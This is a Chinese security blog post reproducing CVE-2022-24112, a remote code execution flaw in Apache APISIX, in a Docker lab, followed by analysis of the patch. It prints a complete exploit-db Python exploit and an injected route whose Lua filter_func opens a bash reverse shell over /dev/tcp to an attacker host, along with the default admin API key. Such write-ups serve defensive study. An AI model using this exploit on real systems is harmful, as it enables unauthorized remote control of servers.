Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用

最新推荐文章于 2025-10-11 01:27:12 发布
原创 最新推荐文章于 2025-10-11 01:27:12 发布 · 8.3k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全

本文详细介绍了Apache APISIX Dashboard的CVE-2022-24112命令执行漏洞,包括漏洞详情、环境部署、目标信息、漏洞利用方式和分析。利用该漏洞,攻击者可以通过批量请求插件绕过IP限制执行远程代码,影响版本为Apache APISIX < 2.12.1和< 2.10.4。

0x01 什么是Apache APISIX Dashboard

Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。

图片

0x02 漏洞详情

漏洞编号:CVE-2022-24112

影响版本:Apache APISIX < 2.12.1

Apache APISIX < 2.10.4 (LTS versions)

漏洞类型: 命令执行

0x03 环境部署

本次在ubuntu云服务器上利用docker搭建漏洞复现环境。

git clone https://github.com/twseptian/cve-2022-24112 ##获取dockerfile文件
cd cve-2022-24112/apisix-docker/example/ ##进入相应目录
docker-compose -p docker-apisix up -d ##启动基于docker的apisix所有服务

图片

让我们使用此命令来确保 docker 映像已在后台运行。完成此操作后,我们可以使用简单的方法访问AP。

$ curl 
'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}

成功访问网站地址http://IP:9000显示登录界面即为部署成功。

图片

0x04 目标信息

访问网站地址http://IP:9000,默认管理员用户名及密码为admin/admin,登录管理后台。

图片

0x05 漏洞利用

在Apache APISIX Dashboard身份认证绕过漏洞(CVE-2021-45232)中存在两个未授权接口,我们尝试访问其接口来获取可用信息:

r.GET("/apisix/admin/migrate/export", h.ExportConfig)
r.POST("/apisix/admin/migrate/import", h.ImportConfig)

访问过后未发现有效信息输出。

图片

exploit-db公布的POC如下,编号50829.py:

# Exploit Title:Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112
import requests
import sys
class color:
  HEADER = '\033[95m'
  IMPORTANT = '\33[35m'
  NOTICE = '\033[33m'
  OKBLUE = '\033[94m'
  OKGREEN = '\033[92m'
  WARNING = '\033[93m'
  RED = '\033[91m'
  END = '\033[0m'
  UNDERLINE = '\033[4m'
  LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]   
def banner():
  run = color_random[6]+'''\n                                  .    , 
      _.._ * __*\./ ___ _ \./._ | _ *-+-
      (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
        |                    |          
\n'''
  run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''          
  run3 = color_random[4]+'''{ Coded By: Ven3xy | Github:https://github.com/M4xSec/ }\n\n'''
  print(run+run2+run3)    

if (len(sys.argv) != 4):
  banner()
  print("[!] Usage   : ./apisix-exploit.py <target_url><lhost> <lport>")
  exit()
   
else:
  banner()
  target_url = sys.argv[1]  
  lhost = sys.argv[2]
  lport = sys.argv[3]
   
headers1 = {
  'Host': '127.0.0.1:8080',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36Edg/97.0.1072.69',
  'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
  'Accept': '*/*',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/json',
  'Content-Length': '540',
  'Connection': 'close',
}

headers2 = {
  'Host': '127.0.0.1:8080',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36Edg/97.0.1072.69',
  'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
  'Accept': '*/*',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/json',
  'Connection': 'close',
}

json_data = {
  'headers': {
      'X-Real-IP': '127.0.0.1',
      'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
      'Content-Type': 'application/json',
  },
  'timeout': 1500,
  'pipeline': [
      {
          'path': '/apisix/admin/routes/index',
          'method': 'PUT',
          'body':'{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars)os.execute(\'bash -c \\\\\\"0<&160-;exec160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&1602>&160\\\\\\"\'); return true end"}',
      },
  ],
}

response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1,json=json_data, verify=False)
response2 = requests.get(target_url+'rms/fzxewh', headers=headers2,verify=False)

这里使用的是twseptian师傅的POC:

git clone https://github.com/twseptian/cve-2022-24112 ##获取POC
cd cve-2022-24112/poc/ ##进入相应目录
chmod +x poc2.py ##添权限

用法:

python3 poc2.py -t [本地测试IP] -p [服务端口] -L [docker通信IP] -P [nc监听端口]

python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 60022

图片

利用nc建立监听,成功执行命令。

nc -lvnp 60022

图片

0x06 漏洞分析

从官方地址下载源码后分析发现,可以得到默认管理员API令牌为:

key:

edd1c9f034335f136f87ad84b625c8-f1

图片

查看官方修复修复记录,发现官方修复方法是关闭batch-requests插件的默认开启。

https://github.com/apache/apisix/pull/6254/commits/d4f0d6ac065e9282b2deca08073bceb62aa13b4a

图片

查看batch-requests官方文档可知,该插件用于http pipeline 的方式进行多接口请求。

https://github.com/apache/apisix/blob/ec0fc2ceaf04a20b0bd0ebdaad67296a1d3f621c/docs/zh/latest/plugins/batch-requests.md

图片

对比2.9.0版本和2.12.0版本,在新的版本中batch-requests插件默认情况下是关闭状态,从而防止批量进行多个接口请求。

图片

图片

登录Apache APISIX Dashboard查看路由,编辑路由信息,可以查看JSON中被写入了bash。

图片

Bash内容如下:

{
"uri": "/rms/fzxewh",
"name": "wthtzv",
"filter_func": "function(vars) os.execute('bash -c\\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/60022;/bin/sh<&160 >&160 2>&160\\\"'); return true end",
"upstream": {
"nodes": {
  "schmidt-schaefer.com": 1
},
"type": "roundrobin",
"hash_on": "vars",
"scheme": "http",
"pass_host": "pass"
},
"status": 1
}

观察代码发现,代码中利用了

filter_func函数,该函数是Apache APISIX在管理API时,用户自定义的过滤函数。

可以使用它来实现特殊场景的匹配要求实现。该函数默认接受一个名为 vars 的输入参数,可以用它来获取 Nginx 变量。示例:

function(vars) return vars[“arg_name”] == “json” end

0x07 总结

攻击者可以滥用批量请求插件发送请求以绕过管理 API 的 IP 限制。Apache APISIX的默认配置(使用默认API密钥)容易受到远程代码执行的攻击。当管理密钥已更改或 Admin API 的端口更改为与数据面板不同的端口时,影响会更小。

但是,绕过Apache APISIX数据面板的IP限制仍然存在风险。批处理请求插件中有一个检查,它用其真正的远程IP覆盖客户端IP。但是由于代码中的错误,可以绕过此检查。

0x08 参考链接

  1. https://github.com/apache/apisix-dashboard

  2. https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112

  3. https://www.o2oxy.cn/3945.html

  4. https://zhuanlan.zhihu.com/p/451281323

  5. https://www.exploit-db.com/exploits/50829

  6. https://blog.youkuaiyun.com/weixin_47559704/article/details/122338456

  7. https://www.bookstack.cn/read/apache-apisix-1.4-zh/33860207d6bb4917.md

  8. https://lists.apache.org/thread/dzmgf0bwfmt58rfbz611gqo2b56qyqwq

  9. https://kavigihan.medium.com/apache-apisix-2-12-1-remote-code-execution-5f920b22ccff

  10. https://blog.youkuaiyun.com/weixin_42353842/article/details/122943253

声明

以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

漏洞复现】Sentinel Dashboard默认弱口令漏洞
晚风不及你
01-15 2618
Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。
Apache APISIX Dashboard 未授权访问漏洞CVE-2021-45232)
Bird&Bird
03-13 1295
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232)
Adminxe的博客
12-29 3371
0x00 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIXCVE-2021-45232 该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的..
APISIX 极简入门
最新发布
油墨香^-^的博客
10-11 551
Apache APISIX 是一款高性能云原生API网关,支持HTTP、gRPC等协议,具备动态热更新和80+插件扩展能力。文章详细介绍了其核心概念(路由、上游、服务等)、Docker快速部署方法、基础操作(创建路由/上游)和常用插件配置(JWT认证、限流等)。同时提供了Kubernetes部署方案、监控日志集成方案及生产环境安全建议,帮助开发者快速掌握这一强大的API网关工具。
CVE-2022-24112 Apache APISIX 命令执行漏洞复现
Love&Share
04-07 6194
如果用户使用 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin Key 且没有额外分配管理端口),攻击者可以通过 batch-requests 插件调用 Admin API ,导致远程代码执行。Apache APISIXApache 软件基金会下的云原生 API 网关,它兼具动态、实时、高性能等特点,提供了负载均衡、动态上游、灰度发布(金丝雀发布)、服务熔断、身份认证、可观测性等丰富的流量管理功能。登陆后台可以看到其添加的一条路由列表,在。
CVE-2022-24112 Apache APISIX 远程代码执行漏洞
m0_71745258的博客
01-29 1711
如图片过大被平台压缩导致看不清的话,需要的话可以扫码,优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享视频配套资料&国内外网安书籍、文档&工具当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。​​需要的话可以扫码,优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享。
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232)
kukudeshuo的博客
12-30 3015
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232) 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIXCVE编号 CVE-2021-45232 FOFA语句 title="Apache APISIX Dashboard" 影响范围 Apache
Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232)
shierbai的博客
05-23 630
Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export`和`/apisix/admin/migrate/import`,他们没有经过`droplet`框架的权限验证,导致未授权的攻击者可以导出、导入当前网关的所有配置项,包括路由、服务、脚本等。然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。进去ggdG清除内容复制进来。
漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)
热门推荐
土豆的博客
12-29 7万+
目录 Part1 漏洞描述 Part2 风险等级 Part3 漏洞影响 Part4 漏洞分析 4.1 漏洞源码 4.2 漏洞验证 4.3 POC Part5 修复建议 Part1 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gin和drople
【复现与代码分析】Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232)
weixin_45694388的博客
04-24 1592
API接口未授权访问一直以来都是令甲方安全人员头疼的问题,在《OWASP API Security Top 10 2019》里面,Broken Object Level Authorization(失效的对象级授权),包括未授权、越权访问等,就是排在第一位的安全问题:未授权漏洞的出现频率越来越高,且漏洞的利用又相对简单,今后应针对这个方向的漏洞多做积累,多做总结。
Apache APISIX Dashboard 未授权访问(CVE-2021-45232 )
一期一会的博客
01-06 2360
0x00 漏洞详情 Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架gin的基础上引入了框架droplet。所有API和认证中间件都是基于框架 droplet开发的,但有些API直接使用了框架gin的接口,从而绕过身份验证,导致未授权访问。 0x01影响版本 Apa
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
m0_58596609的博客
01-17 2930
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
apisix-dashboard:适用于Apache APISIX的仪表板
01-30
Apache APISIX仪表板(实验性) •• 主版本应与Apache APISIX主版本一起使用。 最新发布的版本是 ,应与一起使用。 不建议与其他Apache APISIX版本一起使用。 什么是Apache APISIX仪表板 Apache APISIX仪表板旨在使用户能够通过前端界面尽可能轻松地操作 。 仪表板是控制平面,它执行所有参数检查。 Apache APISIX混合了数据平面和控制平面,并将演变为纯数据平面。 该项目包括Manager API ,它将逐步取代Apache APISIX中的Admin API 。 注意:当前仪表板尚未完全涵盖Apache APISIX功能,查看里程碑。 演示版 URL: http://139.217.190.60/ Username: admin Password: admin 项目结构 . ├── CHANGELOG.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── Makefile ├── NOTICE ├── READM
Apache Apisix网关系统历史漏洞复现分析
道阻且长,行则将至
02-18 3206
Apache APISIX 作为一个动态、实时、高性能的云原生 API 网关,提供了负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。本文总计、复现可 Apache APISIX 网关系统的几个历史 CVE 漏洞
Apache APISIX Dashboard:可视化管理与监控
gitblog_01180的博客
09-01 1175
在现代微服务架构中,API网关(API Gateway)作为流量入口,承担着路由转发、安全认证、流量控制等重要职责。Apache APISIX作为云原生API网关的佼佼者,其强大的功能需要通过直观的可视化界面来管理。这就是Apache APISIX Dashboard的价值所在——它为用户提供了一个现代化的Web界面,让API网关的管理变得简单、高效。 你是否曾经: - 面对复杂的YAML配置文...
【亲测免费】 Apache APISIX Dashboard:一站式API管理界面
gitblog_01237的博客
10-18 885
**项目基础介绍及主要编程语言** Apache APISIX Dashboard,作为Apache软件基金会的一员,是专为Apache APISIX设计的前端控制面板。它采用Go和TypeScript为主要编程语言,巧妙结合了现代Web技术栈,力图提供一个直观且高效的用户界面来操作和管理API服务。此项目的结构清晰,将后端逻辑与前端展示分离,其中`api`目录承载着用于管理etcd和向前端提供接...
Apache APISIX Dashboard 概览
gitblog_01253的博客
10-18 597
Apache APISIX Dashboard 概览 Apache APISIX Dashboard 是一个围绕 Apache APISIX 设计的图形界面管理工具,旨在简化微服务API网关的配置与管理过程。本项目采用现代Web技术栈构建,主要编程语言包括CSS和HTML,辅以JavaScript实现动态交互,遵循Apache-2.0许可证。 核心功能 直观的API管理:允许用户通过UI轻松创建...
漏洞复现】Sentinel Dashboard SSRF漏洞(CVE-2021-44139)
晚风不及你
01-15 2454
Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。
CVE-2022-24112
08-30
CVE-2022-24112是一个Apache APISIX漏洞,详情可以在GitHub上找到详细信息。根据提供的引用,我们可以看到此漏洞的POC在GitHub上的twseptian的仓库中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Apache APISIX DashboardCVE-2022-24112命令执行漏洞方式利用](https://blog.youkuaiyun.com/include_voidmain/article/details/124096869)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.youkuaiyun.com/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值